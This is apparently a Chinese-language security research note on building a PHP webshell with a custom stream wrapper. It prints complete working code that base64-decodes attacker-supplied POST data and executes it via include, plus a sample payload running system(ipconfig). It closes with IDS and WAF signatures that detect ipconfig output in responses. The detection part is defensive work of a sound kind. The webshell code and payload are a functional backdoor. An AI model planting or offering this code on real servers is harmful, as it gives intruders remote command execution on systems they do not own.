PHP 流包装器实现WebShell

引言

收集PHP一些常用webshell

案例

优点：使用php://input 流包装的形势来执行命令。

<?php

class ShellStream
{
    protected $position;
    protected $code;

    public function stream_open($path, $mode, $options, &$opened_path)
    {
        $url = parse_url($path);
        $name = $url["host"];
        $this->code = base64_decode($name);
        $this->position = 0;
        return true;
    }

    public function stream_read($count)
    {
        $ret = substr($this->code, $this->position, $count);
        $this->position += strlen($ret);
        return $ret;
    }

    public function stream_tell()
    {
        return $this->position;
    }

    public function stream_eof()
    {
        return $this->position >= strlen($this->code);
    }

    public function stream_seek($offset, $whence)
    {
        switch ($whence) {
            case SEEK_SET:
                if ($offset < strlen($this->code) && $offset >= 0) {
                    $this->position = $offset;
                    return true;
                } else {
                    return false;
                }
                break;

            case SEEK_CUR:
                if ($offset >= 0) {
                    $this->position += $offset;
                    return true;
                } else {
                    return false;
                }
                break;
            case SEEK_END:
                if (strlen($this->code) + $offset >= 0) {
                    $this->position = strlen($this->code) + $offset;
                    return true;
                } else {
                    return false;
                }
                break;

            default:
                return false;
        }
    }

    // include
    public function stream_stat()
    {
        return stat(FILE);
    }

    // file exists
    public function url_stat(string $path,int $stat)
    {
        return stat(FILE);
    }

    public static function shell(){
        stream_wrapper_register('shell', ShellStream::class);
        if (isset($_POST['code'])) {
            $code = $_POST['code'];
            include 'shell://'.$code;
        } else {
            include 'shell://PD9waHAgZWNobyAiaGVsbG8gaGFjayI7';
        }
    }
}

ShellStream::shell();
?>

code=PD9waHAgZWNobyBldmFsKHN5c3RlbShpcGNvbmZpZykpOw==
base64解码后信息为：<?php echo eval(system(ipconfig));

检测

根据返回值如ipconfig的页面信息提供线索。

FSID_50017363,HTTP,HTTP_Response_Body,FLOW,IMPORT,IMPORT,3,WAF,WAF.Suspicious.Ipconfig.Information.A,NOCASE,0,26,"Windows IP Configuration",0,40,"Ethernet adapter Local Area Connection",NA,NA,NA,0,NA,2018/7/24
FSID_50017364,TCP,NA,FLOW,IMPORT,IMPORT,3,Exploit,Exploit.Suspicious.Ipconfig.Information.B,NOCASE,0,26,"Windows IP Configuration",0,40,"Ethernet adapter Local Area Connection",NA,NA,NA,0,NA,2018/7/24

Window IP 配置   
alert tcp any any -> any any (msg:"WAF.Windows7.CMD.Ipconfig.Threat.A"; flow:established,from_server; content:"Windows IP|20 c5 e4 d6 c3 0d 0a 0d 0a|"; fast_pattern; nocase;  content:"|d2 d4 cc ab cd f8 ca ca c5 e4 c6 f7 20 b1 be b5 d8 c1 ac bd d3|"; distance:0; reference:url,https://blog.csdn.net/yuanfengfengyuan/article/details/88664910; classtype:web-application-attack; sid:70000002; rev:1; metadata:created_at 2019_03_19, updated_at 2019_03_19;)

文件目录
/2018 - Work/研究测试-2019/PHP/流包装器实现webshell/